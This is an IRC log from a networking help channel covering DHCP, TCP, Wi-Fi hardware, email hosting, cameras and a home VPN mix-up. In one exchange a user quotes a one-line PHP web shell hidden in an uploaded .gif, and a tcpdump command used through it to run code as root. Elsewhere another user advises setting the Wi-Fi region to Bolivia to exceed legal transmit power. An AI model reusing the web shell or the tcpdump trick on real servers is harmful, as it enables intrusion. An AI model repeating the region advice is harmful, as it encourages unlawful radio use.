--- Log opened Mon Jun 25 00:00:12 2018
00:04 < swine_> is anyone here familiar with MAAS?
00:32 < AlexPortable> Is it bad to have two or three DHCP servers, given that they are all in different VLANs?
01:06 <+pppingme> AlexPortable if they are on different networks, then you don't have multiple dhcp servers, you have multiple networks.. each with its own single dhcp server
01:08 < AlexPortable> true, but wouldn't the router be in the same network too?
01:14 < Harlock> AlexPortable no one knows what you did
01:54 < BenderRodriguez> AlexPortable: well, the DHCP broadcasts would be limited to the VLAN so it shouldn't be an issue
01:55 < lupine> don't set your router up to accept dhcp broadcasts from the distribution side
01:55 < lupine> that would be crazy
03:13 < dunnousernamefn> Hey, if I connect the RX of every device to the TX of a router-like device, then the router's RX to every TX, will it work properly?
03:13 < dunnousernamefn> I'm going to desolder an RJ45 because... why not
03:14 < RJ45> fukyu
03:14 < dunnousernamefn> oh hello
03:15 < RJ45> https://www.youtube.com/watch?v=s2oCV2sM_ig
03:16 < dunnousernamefn> but like I have a legitimate question
03:16 < RJ45> oh well
03:25 < SwedeMike> dunnousernamefn: I doubt it, you actually have to have a real hub.
03:26 < dunnousernamefn> Thanks
04:49 < prasket> I am currently using DHCP Static Mappings for my instances in my home lab to give them static IPs. I am in the middle of setting up DNS via BIND on its own instance. I should add of all of these mappings to the A records in BIND and then remove them from the DHCP Static Mapping. Then also in my DHCP Server setup my DNS as my BIND instance right?
04:51 <+pppingme> prasket do you mean dhcp reserved??  there is no such thing as dhcp static
04:53 < prasket> @pppingme it says "DHCP Static Mappings for this Interface" in the area I am working on, this is in PFSense maybe that is their name for dhcp reserved?
04:56 <+pppingme> I don't use pfsense..  but yeah, just sounds like poor phrasing
04:56 <+pppingme> unless its a way to keep pfsense from even thinking about those ip's
04:57 < Spice_Boy> it's trying to word it as the 'map' is static
04:58 < Spice_Boy> maybe they could have used some word other than static, but we know what they mean
05:03 < prasket> actually thinking about it I think I would need to leave those mappings in place.. just not add a hostname to the entry and let that come from the DNS Server I am setting up. That or I will need to setup all my instances with Static IP.
05:11 < Holo> BIND can do DHCP?
05:11 < Holo> o.o
05:11 < Apachez> no
05:11 < Apachez> bind is for DNS
05:12 < Holo> thats what I thought
05:12 < Holo> prasket ao aka no
05:12 < Holo> :P
05:13 < `7hr34t_hvntr> hello
05:14 < `7hr34t_hvntr> whats the difference between a packets sequence number and a segments sequence number
05:14 < `7hr34t_hvntr> i was looking at an example and it seemed like they were the same number
05:18 < Holo> Each endpoint of a TCP connection establishes a starting sequence number for packets it sends, and sends this number in the SYN packet that it sends as part of establishing a connection.
05:18 < Holo> ;P
05:18 < Holo> and if we look here https://i.stack.imgur.com/Hi3zX.jpg
05:20 < `7hr34t_hvntr> so basically that is generated at transport layer and flows into network layer
05:22 < `7hr34t_hvntr> and the packet gets stamped with it?
05:22 < Holo> its inside the TCP header at the transport layer
05:22 < `7hr34t_hvntr> cool
05:22 < Holo> tcp is all layer 4
05:23 < `7hr34t_hvntr> but the PDU of the transport layer is the segment right, so isn't it the segment which has the sequence number, not the packet
05:23 < Holo> we have a nasty habbit of reusing words
05:24 < `7hr34t_hvntr> lol
05:33 < buu> 14:46 < buu> Anyone know of a good udp based file transfer program designed for high speed wans?
05:34 < rewt> nc
05:35 < batch> maybe aria2c ?
05:35 < Holo> um
05:35 < Holo> tftp batch
05:35 < Holo> err buu
05:35 < Holo> :P
05:35 < batch> tftp?
05:36 < Holo>  Anyone know of a good udp based file transfer program designed for high speed wans?
05:36 < Holo> :P
05:36 < batch> trivial file transfer protocol i know
05:36 < Holo> TFTP
05:36 < Holo> :P
05:36 < Holo> there is a reason most use tcp
05:37 < batch> curl?
05:37 < batch> wget?
05:37 < Holo> oh
05:37 < Holo> DCC
05:37 < batch> i use aria2c for torrents but torrents are tcp only i think
05:39 < batch> tar and netcat prolly like rewt said Holo
05:39 < batch> :p
05:39 < Holo> -lol
05:43 < batch> oh i see
05:43 < batch> buu asked the question
05:44 < Milos> Does anyone know why using socat to forward UDP DNS to TCP DNS does not seem to work? socat is able to contact the TCP DNS server with the original DNS request, but it seems the reply never gets sent back to the originating machine who sent the request over UDP.
05:44 < Milos> the command I'm using: socat udp-listen:53,fork tcp-connect:127.0.0.1:53
05:45 < Milos> I tested the same thing with a simple python TCP server and python UDP client and that worked fine...
05:46 < batch> Milos iptables?
05:46 < Milos> None
05:46 < batch> is it possible to connect to 0.0.0.0 maybe
05:47 < Milos> ??
05:47 < batch> i thought like 127.0.0.1 is only sending and receiving in localhost
05:47 < batch> maybe you are receiving from external host
05:47 < Milos> No
05:47 < batch> ah ok
05:47 < batch> no clue then
05:51 < buu> I'll have to try netcat in udp mode sometime lol
05:51 < buu> Not a very good answer though
05:52 < xtrWrithe> buu: i recommend yoy ncat (nmap devs)
05:52 < xtrWrithe> more features
05:57 < xtrWrithe> jackbrown: how was that?
05:58 < jackbrown> xtrWrithe, good morning
05:58 < jackbrown> xtrWrithe, what are you talking about?
05:59 < jackbrown> xtrWrithe, dl ylj th
05:59 < jackbrown> do you guys think that buying a wifi card like this will improve my laptop wifi speed and stability ? https://www.ebay.it/itm/DELL-LATITUDE-E7440-INTEL-MINI-PCI-WIFI-CARD-7260HMW-08TF1D-INTEL-WIRELESS-AC/253685610654?hash=item3b10d7389e:g:cvYAAOSwxjxa8H8t
06:00 < xtrWrithe> jackbrown: why you dont fix the router
06:00 < jackbrown> xtrWrithe, how ?
06:01 < xtrWrithe> jackbrown: just change the txpower of the card , nobody mentioned that?
06:01 < xtrWrithe> in lan card
06:01 < jackbrown> xtrWrithe, I have another FRITZ!Box 7490, i just swapped and set the same setting as previous and I have the same signal
06:01 < jackbrown> xtrWrithe, how can I change the txpower of the card I'm using in the laptop ?
06:01 < jackbrown> xtrWrithe, you mean in the wifi card on my laptop ?
06:05 < xtrWrithe> jackbrown: yes, iwconfig will do that and be sure to set BO (bolivia) the region
06:06 < jackbrown> xtrWrithe, Bolivia ? because that's the country where it's allowed  ?
06:06 < xtrWrithe> jackbrown: ye
06:06 < xtrWrithe> https://null-byte.wonderhowto.com/how-to/set-your-wi-fi-cards-tx-power-higher-than-30-dbm-0149606/
06:06 < jackbrown> xtrWrithe, ok let's try
06:06 < xtrWrithe> jackbrown: skip the driver compiling part
06:07 < jackbrown> iw reg set BO
06:07 < jackbrown> iwconfig wlan0 txpower 30
06:07 < xtrWrithe> yes set it down first
06:07 < jackbrown> ok I have to shut down wireless first
06:08 < xtrWrithe> also make sure it doesnt left networkmanager/wpasupplicant/dhcp etc PIDs opened
06:08  * BenderRodriguez 
06:09 < jackbrown> xtrWrithe, dunno how to do that
06:09 < xtrWrithe> do you have aircrack installed'
06:09 < xtrWrithe> it comes with a process killer in airmon
06:09 < xtrWrithe> so it shutdown all the related stuff
06:10 < LissajousPattern> man I need to figure out a better solution to my home networking
06:13 < LissajousPattern> I am now starting to feel the pain of being limited to a mobile hotspot. downloading a game is painful.
06:14 < jackbrown> xtrWrithe, didn't worked
06:15 < skyroveRR> BenderRodriguez.
06:15 < jackbrown> xtrWrithe, trying this https://www.linuxquestions.org/questions/linux-wireless-networking-41/howto-adjust-tx-power-of-atheros-ar9285-wireless-card-4175428414/
06:21 < zenix_2k2> one question, is there any book that easily guide beginners through modern networking ? most i found was either out-dated or confusing
06:22 < xtrWrithe> zenix_2k2: what you mean by modern?
06:22 < xtrWrithe> zenix_2k2: focus on getting something done and you will find out which way is need to end it
06:23 < zenix_2k2> well, i mean that the information isn't out-dated ?
06:23 < zenix_2k2> well cause i was reading a book and then ask a few questions here which was confirmed to be out-dated
06:23 < zenix_2k2> like IP classes i guess and a few more
06:23 < zenix_2k2> but maybe people here have better suggestions
06:24 < zenix_2k2> but luckily it was only a few first pages so i can still save my time :P
07:25 < squ> what is the best way to buy domain and create 20 e-mails in it
07:30 < light> step 1, buy the domain
07:30 < squ> https://www.hostgator.com/shared-compare
07:30 < squ> here they offer unlimited e-mails for $4/mo
07:31 < squ> https://www.godaddy.com/hosting/email-hosting
07:31 < squ> https://www.godaddy.com/email/professional-email
07:31 < light> zoho.com has 25 free mailboxes
07:32 < squ> godaddy offers £3 per user per month
07:32 < squ> which is kinda expensive
07:32 < light> it's not expensive really
07:32 < light> I wouldn't host someone elses email for that little
07:33 < squ> https://www.zoho.eu/mail/
07:33 < squ> Secure, fast, ad-free email for business. Free for up to 25 users. Plans start at €2 /month.
07:34 < squ> light: zoho is not hosting?
07:34 < light> eh?
07:34 < squ> I'll have to buy domain elsewhere and delegate mx records to zoho?
07:35 < light> Right
07:35 < squ> and its $2 per month for 25 users?
07:35 < light> No..
07:35 < light> < squ> Secure, fast, ad-free email for business. Free for up to 25 users.
07:35 < squ> free?
07:36 < squ> 25 emails for free?
07:36 < light> Yes.
07:36 < squ> what is the catch
07:36 < light> Go read the terms and conditions.
07:36 < squ> but you've read it already didn't you
07:37 < light> What matters to one person doesn't to another
07:37 < light> One should do their own due diligence
07:37 < light> Although since it's free it's not like you can lose
08:22 < jackbrown> Could anyone suggest me a good motorized dome surveillance camera for outdoor ?
08:26 < jackbrown> hello
08:38 < Atro> No
08:41 < jackbrown> Atro, ?
08:41 < Atro> Wrong channel
08:44 < jackbrown> Atro, where can I ask?
08:44 < jackbrown> Atro, isn't related to networking? last days some user talk about surveillance systems etc.
08:45 < Atro> Idk look up reddit
08:50 < detha> The only thing 'networking' about security cameras is: put them on their own vlan, with no direct internet access. Doesn't matter if it's a $900 Axis, or a $99 Finest Chinesium, firewall it off.
08:52 < Atro> And eat all their shitty traffic
08:57 < detha> shitty traffic? we put cams in the toilets now too?
08:59 < detha> hmm. there's a product idea. rear-view camera, with a monitor on the toilet door.
09:00 < Atro> I meant all the call home, broadcast, multicast
09:02 < detha> Ah, you mean the ITCH - the Internet of Things Calling Home
09:10 < Atro> hahah
09:14 < jackbrown> detha, why no internet access ?
09:15 < jackbrown> detha, you are afraid that someone can hack the system and gather access to the camera to use against ? (for example studying how to work around the camera )
09:16 < detha> jackbrown: because buggy or less-than-trustworthy firmware
09:16 < jackbrown> detha, ?
09:17 < jackbrown> detha, what happen if the came have buggy firmware?
09:17 < detha> basically what you said. a significant part of one of the recent DDoS botnets was security cameras
09:18 < jackbrown> detha, gosh
09:19 < jackbrown> detha, do you have any brad or system to suggest for my home surveillance ? There are too many from chinese kit all included to AXIS ultra expensive
09:20 < detha> Sorry, not enough personal experience to compare. Only IP cameras I've worked with were Axis and some other similar brand. Bit expensive for home use
09:21 < squ> detha: how expensive?
09:21 < jackbrown> detha, definitely too expensive, they don't need to break into your home to steal, they can just grabe the cameras if you install Axis
09:21 < jackbrown> squ, search i found some Axis arount 3900€
09:21 < jackbrown> squ for a single camera
09:22 < squ> obama dollars?
09:22 < detha> squ: random Axis dome: $799 on amazon
09:22 < squ> detha: why so expensive?
09:22 < squ> that's gopro price
09:22 < detha> EUR 4K you are talking outside, color, full res under low light conditions, etc.
09:23 < squ> how do you connect them?
09:23 < detha> ethernet PoE
09:24 < jackbrown> yep PoE
09:24 < squ> into what?
09:24 < squ> local hardware server or cloud?
09:24 < detha> proprietary systems
09:24 < squ> that means homemade?
09:24 < Atro> lol
09:25 < squ> Atro: proprietary noname, what else?
09:25 < detha> that means especially made for one purpose by $company
09:25 < Atro> Organic
09:25 < squ> especially made
09:25 < squ> allright :)
09:26 < squ> detha: made with love I suppose?
09:26 < squ> what software are you using to display feeds?
09:27 < detha> given how badly the first models performed, not much love involved. After many complaints they improved them a bit
09:28 < detha> also, no feeds involved (except for setting up/debugging)
09:28 < squ> one friend told me they deployed NVR recently, plug in and that's all. I assume it has dynamic dns or camera has setup cloud account
09:41 < kur0mi> :D
09:59 < jamesP> hi, a friend of mine is performing an attack in my web server(local that i built), i found on the net that i could use wireshark and then monitor it while im not there, so i got a tcpdump file, but there is many information in there..
09:59 < jamesP> what should i do to track something paranormal in there?
10:01 < jamesP> there many pink colour packets and some amount of green
10:02 < jamesP> the pink ones as i can see are ssh
10:02 < jamesP> and some tcp's with the ACK message
10:04 < h0dgep0dge> that's a really non-specific question
10:25 < jamesP> ohhh i found it out, its a metasploit fake file jpeg
10:25 < jamesP> from an upload form
10:50 < regdude> Is 2.5, 5G a physical standard or can it be added using software? I mean, does the OSC frequency change from 1.25G or 10G?
10:56 < mjauschwitz> G literally refers to frequency
10:56 < mjauschwitz> 2.5GHz vs 5GHz band
10:56 < mjauschwitz> 2.4
10:59 < jackbrown> hey
10:59 < jackbrown> can anyone help me to check which is the difference between the two WiFi  board ?
10:59 < jackbrown> 1)  https://www.ebay.it/itm/Intel-7260AC-802-11AC-AC-BT-4-0-DUAL-BAND-WiFi-WLAN-Wireless-Card-7260HMW-W041/291886890290?hash=item43f5d07d32:g:MdcAAOSw5NJakVk4
10:59 < jackbrown> 2)   https://www.ebay.it/itm/Intel-HP-7260AC-802-11ac-BT-4-0-DUAL-BAND-WiFi-WLAN-Wireless-Card-7260HMW-W009/292460456940?hash=item4418006bec:g:~5QAAOSwd9Za2Gsr
10:59 < jackbrown> thanks
11:00 < squ> jackbrown: ebay page may not have specs
11:00 < squ> seller could paste anything
11:00 < jackbrown> squ, there are specs, they should be the same jut for the fact that one end with W009 and the other W041 and there's a small price difference
11:01 < jackbrown> squ, if i didn't misunderstood Intel produces just ONE 7260 Dual Band AC compatible with 300/867 speed
11:01 < jackbrown> squ, so they should be the same
11:01 < jackbrown> squ, anyway I'm looking for a mPCIe card to upgrade my laptop if you have any suggestion i'd appreciate
11:02 < squ> I'd search official website for specs
11:02 < squ> maybe it has a compare function like ark.intel.com
11:02 < jackbrown> squ, https://ark.intel.com/compare/75440,78541,75439
11:03 < squ> that's the answer, right?
11:03 < jackbrown> squ, so intel produces just one board   correct ?
11:04 < jackbrown> squ, I mean with ac and Dual Band
11:04 < jackbrown> squ, 7260 of course
11:04 < squ> I have no idea, but website marked all 3 Discontinued
11:05 < jackbrown> squ, don't worry thanks for helping
11:06 < squ> you are welcome
11:06 < regdude> mjauschwitz: not wireless, Ethernet
11:11 < zenix_2k2> so guys, is there any suggestion on what networking book i should read ?
11:11 < mcdnl> regdude: i dont think so
11:11 < zenix_2k2> and please something that isn't too out-dated, like IP classes
11:11 < mcdnl> ccna its a good start
11:14 < ne2k> mcdnl, does CCNA mention IP classes?
11:18 < ne2k> zenix_2k2, I would stay well clear of Cisco, but that's just my opinionated opinion
11:18 < Roq> I think the current version still mentions classes but you don't get questions on it on the exam, everything is CIDR. CCNA is to get you introduced to various networking topics and so it still mentions classes as legacy content
11:19 < Roq> ne2k: What's your vendor flavour?
11:19 < djph> jackbrown: intel produces dozens of boards ... although if you have specific needs (e.g. 2x2), you may find that options are limited.
11:20 < jamesP> Can someone tell me whats this command do that i found from tcpdump that was run in my webserver? GET /uploads/a.gif?c=sudo%20tcpdump%20-ln%20-i%20enp0s3%20-w%20/dev/null%20-W%201%20-G%201%20-z%20test%20-Z%20root HTTP/1.1\r\n
11:20 < jamesP> the malicious user had access by uploading a .gif(metasploit file) and he was running commands through url
11:21 < djph> GET is a request to ... well, GET ... things
11:22 < jamesP> <?php $c=$_GET[c]; echo '$c'; ?>
11:22 < jamesP> that was inside in the gif file
11:22 < djph> he told your server to "get" a.gif (which it ran)
11:22 < jamesP> yea
11:22 < jamesP> and it run the above statement
11:23 < jamesP> so is this gif file a metasploit, is that how it is called?
11:23 < djph> so it ran the command "sudo tcpdump ls inp0s3 -w /dev/null -W 1 -G 1 -z test -Z root
11:23 < jamesP> yea
11:23 < ne2k> djph, minus the typos, yeah
11:24 < djph> err, some typing errors on my part, but otherwise that.
11:24 < djph> shutup ne2k :P
11:24 < djph> in other words, your webserver sucks.
11:24 < jamesP> he also run a command where he addauser
11:24 < ne2k> jamesP, are you sure it says echo '$c'; and not echo `$c`; in the file?
11:25 < ne2k> not sure how it would run it if not
11:25 < jamesP> its the second
11:25 < zenix_2k2> ne2k: and by Ciso you mean CCNA ?
11:25 < ne2k> jamesP, why did you write '' then?
11:26 < jamesP> sorry typo i couldnet get it copy paste
11:27 < jamesP> so i have to fix better the files that someone can post, like filtering them
11:27 < jamesP> anyway thanks a lot guys!
11:27 < jamesP> so that was a metasploit attack or something right?
11:28 < ne2k> zenix_2k2, I mean Cisco generally. they're overpriced, think they know everything, think their way is THE WAY, give stupid names to things that everyone else knows by other names, and are generally annoying
11:30 < djph> jamesP: well, it was someone exploiting your shitty webserver.  Whether or not it was "metasploit" specifically, we can't tell.
11:31 < ne2k> why your webserver is configured to run php in files ending in .gif I have no idea
11:31 < jamesP> as i can see it was passed like a gif file
11:31 < jamesP> from the form where i only accepted gif and jpeg
11:32 < ne2k> but why is your webserver running as PHP a file ending in .gif?
11:32 < ne2k> any why is your server running as PHP anything that has been uploaded?
11:33 < ne2k> it's just configured extremely badly
11:33 < jamesP> yeaa probably chmods(executing files) or something like that, and bad filtering, anyway thank you guys for the help
11:40 < mjauschwitz>  <?php $c=$_GET[c]; echo '$c'; ?>
11:40 < mjauschwitz> this code will fail
11:41 < mjauschwitz> if this is literally what was uploaded then it is non-functional
11:41 < mjauschwitz> PHP does not interpolate in single quotes
11:42 < mjauschwitz> oh i read the rest of it nvm
11:45 < zamba> i need a tool to visualize network throughput (graph)
11:45 < zamba> ntopng only graphs while the transfer is going.. i need a way to sample often and then create a detailed graph
11:46 < zamba> and i should also be able to filter out traffic
11:48 < zenix_2k2> ne2k: so can i have the title of their book please ?
11:48 < mjauschwitz> zenix_2k2: cacti?
11:48 < mjauschwitz> er
11:48 < mjauschwitz> zamba: ^
11:49 < zenix_2k2> no i don't mean software, i mean the networking books of CIsco
11:49 < zamba> mjauschwitz: that takes a bit too much to get up and running
11:52 < zenix_2k2> oh and i also found this book https://www.amazon.com/Networking-Dummies-Computer-Tech/dp/111925776X/ref=pd_sbs_14_2?_encoding=UTF8&pd_rd_i=111925776X&pd_rd_r=6aa9bb23-785d-11e8-b657-fff5d677929c&pd_rd_w=MvqQh&pd_rd_wg=ALFHJ&pf_rd_i=desktop-dp-sims&pf_rd_m=ATVPDKIKX0DER&pf_rd_p=5825442648805390339&pf_rd_r=FW38ES3PDWDGHVQEYJAS&pf_rd_s=desktop-dp-sims&pf_rd_t=40701&psc=1&refRID=FW38ES3PDWDGHVQEYJAS, but not sure if it is too out-dated
11:52 < zenix_2k2> can someone who has read that please give me some advises ?
11:53 < djph> zenix_2k2: Tanenbaum is typically the recommended go-to in the channel (IIRC, it's even noted in the /topic)
11:54 < zenix_2k2> but there are too many versions of them
11:54 < zenix_2k2> idk which to go for
11:54 < djph> the latest?
11:55 < zenix_2k2> hm, i can't really see the releasing dates
11:55 < zenix_2k2> i think i have to get the book to know
11:55 < djph> I mean if there's version 1-4 (for example), you'd want version 4
11:55 < zenix_2k2> well ok then
11:55 < zenix_2k2> thk
11:57 < zenix_2k2> but let's just say when i have finished version 4 and in the future it releases version 5, should i also buy a read it ?
11:59 < djph> probably not
11:59 < djph> hypothetically you wouldn't need an "introductory" type book by then - so you'd just read the specs on whatever's new (or a book on the new tech)
12:01 < zenix_2k2> book on new tech ? like what
12:01 < zenix_2k2> just wanna know so i can save it back after "for dummies"
12:03 < jackbrown> hey but the AC standard is just for 5GHz?
12:25 < h0dgep0dge> got some unexpected good news this morning, some guys from the telecom are coming to install my fibre tomorrow
12:25 < h0dgep0dge> though unfortunately i won't actually be able to use it for another week, not sure why
12:46 < AlexCDev> Hi
12:46 < Gollee> AlexCDev: hi
12:46 < AlexCDev> I have a weird looking packet appearing in a tcpdump output
12:46 < Gollee> cool
12:46 < AlexCDev> "192.168.4:8888 > 192.168.1.3.rplay"
12:47 < AlexCDev> Any ideas what the .rplay is?
12:47 < Gollee> a protocol
12:47 < Gollee> https://www.arcam.co.uk/products,rSeries,Music-Streamer,rPlay.htm
12:47 < Gollee> probably
12:48 < vver> talking about wierd things i saw that chrome does wierd dns requests like  lfajnhzridrxmm ; omfnlsi etc what are those?
12:48 < Phil-Work> catphish, that layer 3 provider you mentioned the other day got lost in my scrollback
12:48 < Phil-Work> who was it?
12:49 < detha> vver: chrome trying to see if anything is hijacking your DNS
12:51 < detha> AlexCDev: that's just tcpdump trying to be friendly. use 'tcpdump -nn' to see the actual port number
12:52 < AlexCDev> detha: ah cheers
12:53 < vver> lets say i have google.com in dnsmasq.conf (router) pointed to 127 will chrome be able to go back to google servers?
12:53 < AlexCDev> Gollee: Someone's been using the office raspberry pi for airplay streaming hahah
12:53 < vver> to report this "hijacking" or smth?
13:01 < detha> vver: google has many domains besides google.com. I do not think it is for reporting back to them, but if something is hijacking nxdomain the browser may warn you
13:02 < vver> i have a list of google domains added
13:05 <+catphish> Phil-Work: hSo?
13:06 <+catphish> Phil-Work: we use them for transit, and i know they provide various related services, leased lines, etc
13:26 < ne2k> jackbrown, 802.11ac is only meant for use in the 5GHz band, yes
13:31 <+catphish> ne2k: yes
13:31 <+catphish> ne2k: see https://en.wikipedia.org/wiki/IEEE_802.11#Protocol
13:40 < djph> Watch that table though -- there's a footnote somwehere that admits the "2.4GHz" rates are specific to 802.11n
13:49 < o0oScoRcHo0o> do any of you use smokeping?  if so, I am trying to figure out what i did wrong.  I get the data I need but my host is showing 2 graphs for each time period.  One is correct.  One says Last X Hours from "master server" and its blank..  Where "master server" is my main smokping server.   I have the data i need but just want to clean up those weird duplicates
13:49 < o0oScoRcHo0o> i tried just removing the rrd files from /var/lib but no luck
13:58 <+catphish> djph: err what? the rates are all listed for specific protocols
14:02 < djph> catphish: oops, I'm thinking of this page -- https://en.wikipedia.org/wiki/IEEE_802.11ac#Advertised
14:04 < djph> someone was getting confused by that table Wed or Thu last week, since the *page* is for 802.11ac ... but it's showing info for the 802.11n capabilities on dual-band products 2.4Ghz.
14:04 < djph> *2.4GHz radio
14:05 <+catphish> a lot of people don't realise the advertised speeds on ac devices are for 5GHz only :)
14:06 < djph> catphish: the guy was getting confused, and was a tinfoil nutter that the 2.4 GHz was going to give him cancer or something.
14:06 <+catphish> lol
14:07 < djph> so he wanted to use 802.11ac, but get the max throughput with 5 GHz only ... and was a bit broken-record on "but the table shows it's using both!"
14:07 <+catphish> oh those ratings that add both together are just dumb
14:13 < djph> no, it wasn't a rating -- he was thinking that to get the "full throughput" of 802.11ac, he needed both the 5 GHz (to get ~800) and the 2.4 GHz (to get ~300), and didn't understand that to get 1300mbps (or whatever), he needed a 3x3 802.11ac card / AP
14:14 < djph> and the table on that page didn't help any, at least when he was reading it, because he mistook the "oh, and it does 300mbps on 802.11n 2.4 GHz" column as "see, it does 802.11ac on 2.4 GHz"
14:16 < sparrowsword> connected to my vpn.. how to i get port 80/443 forwarded to 1194? im using a raspberrypi as my server and a ubuntu vm as my client
14:18 < ne2k> sparrowsword, wut
14:19 < djph> ^
14:19 < sparrowsword> ne2k: perhaps i misunderstand vpn, but why does my ip of my physical computer resolve to the same ip as my vm?
14:19 < sparrowsword> when i am connected to the vpn
14:19 < djph> it doesn't
14:20 < sparrowsword> do i need something like... sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -i eth0 -j REDIRECT --to-port 1194
14:20 < ne2k> sparrowsword, take a step back and explain slightly more about what you're actually trying to do, and what the setup is, as we currently have no clue what you're doing
14:20 < sparrowsword> im trying to connect to a vpn to alter my ip address on the virtualmachine using workstation
14:20 < mercxry> sparrowsword Your traffic goes to your vpn then from your vpn to the site you're connecting, then the response goes back to your pc
14:21 < sparrowsword> the workstation vm is connected to my openvpn server on my pi
14:21 < ne2k> sparrowsword, you're talking about "my vpn" and "the vpn" and "my physical computer" and "my vm", but we have no idea what any of those things is or how they are connected together
14:21 < sparrowsword> mercxry: thats what i thought... perhaps im not connected...
14:22 < sparrowsword> ne2k: i am using pivpn on my raspberrypi
14:22 < sparrowsword> ne2k: and i am using this computer, the one i am talking to you with to run a virtual machine, and that virtual machine is connected the the pivpn/raspberrypi
14:23 < sparrowsword> however, when i go ipchicken for example, it resolves this computers ip as the same ip as the vm
14:23 < djph> sparrowsword: I assume that "this computer" and "the pi" are in two physically separate locations.  Correct?
14:24 < sparrowsword> yes
14:24 < djph> OK, and that you've enabled "push redirect def1" (or whatever) on the ovpn server.conf, correct?
14:25 < ne2k> did anyone mention openvpn?
14:25 < ne2k> oh, yes, he did
14:25 < djph> ne2k: it's "pivpn" on a raspberry pi ... pretty sure that's ovpn based.
14:25 < djph> ne2k: although I could be wrong :(
14:25 < ne2k> sparrowsword, where is the pi?
14:26 < sparrowsword> on my desk, this computer is at my feet
14:26 < sparrowsword> will this not work sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -i eth0 -j REDIRECT --to-port 1194 if i am using a bridged connection to the vm?
14:26 < sparrowsword> not sure what nat is
14:26 < ne2k> sparrowsword, so when you said "yes" to "<djph> sparrowsword: I assume that "this computer" and "the pi" are in two physically separate locations.  Correct?", that was incorrect? the pi and the computer are both in the same location?
14:27 < sparrowsword> this computer is not the same as the pi
14:27 < ne2k> sparrowsword, the question was not whether the computer was the same as the pi, the question was whether they were located at the same physical location
14:28 < sparrowsword> are they local? yes
14:28 < ne2k> by which we mean, you know, like, building level, not, like, to the millimetre
14:28 < sparrowsword> yes
14:28 < mercxry> And you have separate public ip for them?
14:28 < sparrowsword> no
14:29 < sparrowsword> thought vpn changes this
14:29 < mercxry> The VPN IP should be different to change
14:29 < mercxry> It's not magical
14:29 < sparrowsword> you mean the pi ip has to be different to change the public ip of the vpn?
14:30 < ne2k> sparrowsword, NO ONE IS CHANGING ANY IPS
14:30 < ne2k> you cannot CHANGE your IP. you can masquerade certain traffic behind a differnet public IP address by means of tunnelling
14:30 < sparrowsword> that is what i am trying to do
14:30 < djph> sparrowsword: to clarify my enquiry -- the "two locations" are, e.g. your home and your mom's house (or home and office, or home and starbucks, etc.)
14:31 < sparrowsword> home & home
14:31 < mercxry> ne2k Thanks for the explanation, by changing the IP he mean masquerading
14:31 < djph> not "one is upstairs, and the other in the basement"
14:31 < sparrowsword> they are in the same room
14:31 < ne2k> sparrowsword, and, by the way, a "service that offers you masquerading behind a remote IP address" is NOT what "a VPN" means
14:31 < sparrowsword> mercxry: i am attempting to create something like a proxy
14:32 < mercxry> sparrowsword Yeah I understood that, but you can't with the same IP on 2 machines
14:32 < ne2k> sparrowsword, what is your end goal? that the apparent public IP of the VM should be something remote? if so, what is the purpose of the Pi? why not just run the masquerading proxy client on the VM?
14:33 < sparrowsword> the purpose of the pi was to masquerade the public ip for the vm
14:33 < sparrowsword> my end goal is to have the vm have a different public ip than the one on this computer
14:33 < djph> sparrowsword: that's not doing to work if the pi (and the VM) are on the same network (i.e. at home)
14:33 < sparrowsword> or the pi vs this computer
14:34 < djph> your router (presumably provided by the ISP) will be the ultimate arbiter of the IP address masquerade.
14:34 < sparrowsword> djph: so something like privatetunnel offers a vpn that is different than the vpn that i can create at home?
14:35 < ne2k> djph, my understanding is that the pi was running a masquerading proxy client
14:35 < djph> yes, you connect to *their* servers somewhere "not at home".
14:35 < sparrowsword> was under the impression from ##programming that this was possible at home :-/
14:36 < djph> ne2k: I think he's perhaps getting confused about two different things.  (1) general IP address masquerading and (2) what a VPN actually does.
14:36 < sparrowsword> let me ask another question...
14:36 < ne2k> sparrowsword, are you saying you don't already have an account with one of these masquerading proxy "VPN" services?
14:37 < sparrowsword> if i am going to ipchicken.com using this computer, i will get a specific ip address, when i use privatetunnel vpn i get a different ip address
14:37 < sparrowsword> ne2k: at this current moment, no
14:37 < ne2k> you are contradicting yourself. what is privatetunnel if it isn't one of those services, and how are you using it if you don't have an account?
14:37 < sparrowsword> why is it when i use someone else's vpn, i get a different ip address, but when i use my own vpn, i get the same public ipv4
14:38 < sparrowsword> ne2k: i was using them as an example of something besides my own vpn
14:38 < ne2k> sparrowsword, it is not at all clear what "your vpn" is
14:38 < ne2k> sparrowsword, yes, but you're saying it works, so you must have used it?
14:38 < sparrowsword> an openvpn server on the raspberrypi
14:39 < sparrowsword> privatetunnel works, yes i have used it
14:39 < sparrowsword> it seems that they route all traffic to one port
14:39 < djph> they do
14:39 < ne2k> sparrowsword, and you are running privatetunnel client on the pi?
14:39 < sparrowsword> ne2k: no
14:39 < ne2k> djph, dafuq
14:39 < sparrowsword> privatetunnel was in the past
14:39 < ne2k> sparrowsword, so what is the apparent public IP of the pi?
14:40 < sparrowsword> the same 1 as this computer
14:40 < ne2k> sparrowsword, so have you examined your brain for damage?
14:40 < sparrowsword> 73.190.110.8
14:40 < ne2k> sparrowsword, how on earth is it going to give a different apparent public IP to the VM?
14:40 < sparrowsword> thats a contradiction..
14:40 < djph> ne2k: here's what he's doing (1) had a tunnelbear/privatetunnel/pia/etc. account, got tired of paying money.  (2) set up a pivpn (ovpn) server at his house.  (3) is confused that "remote masquerade" is different than the "local masquerade" of his router.
14:40 < sparrowsword> thought creating my own vpn was the same thing as privatetunnel creating theirs
14:41 < djph> sparrowsword: it is; but you're thinking about it backwards.
14:41 < ne2k> sparrowsword, yes, and this sort of thing is the exact reason why I absolutley cannot stand people referring to their service as "a VPN"
14:41 < sparrowsword> wtf...
14:41 < sparrowsword> what else to call it?
14:41 < djph> ne2k: mind slowing down for a moment, lemme explain this to the guy.
14:42 < ne2k> djph, sure
14:42 < djph> sparrowsword: OK, so PIA/tunnelbear/etc. they run a series of openVPN servers "somewhere on the internet".  When you connect to their services, they "hijack" your routing table to send everything through their service.
14:42 < sparrowsword> so lemme clarify.. remote masquerade is not possible at home
14:43 < ne2k> but you agree that the entire reason for this confusion is people saying that that service /is/ "a VPN"? it's not a fcuking VPN. it might use a VPN as part of the service, but that does make it "a VPN"
14:43 < sparrowsword> okay
14:43 < djph> sparrowsword: correct; at least not when routing through two machines "at home".
14:43 < djph> ne2k: yes, I agree.
14:44 < sparrowsword> does or does not make it a vpn ne2k:
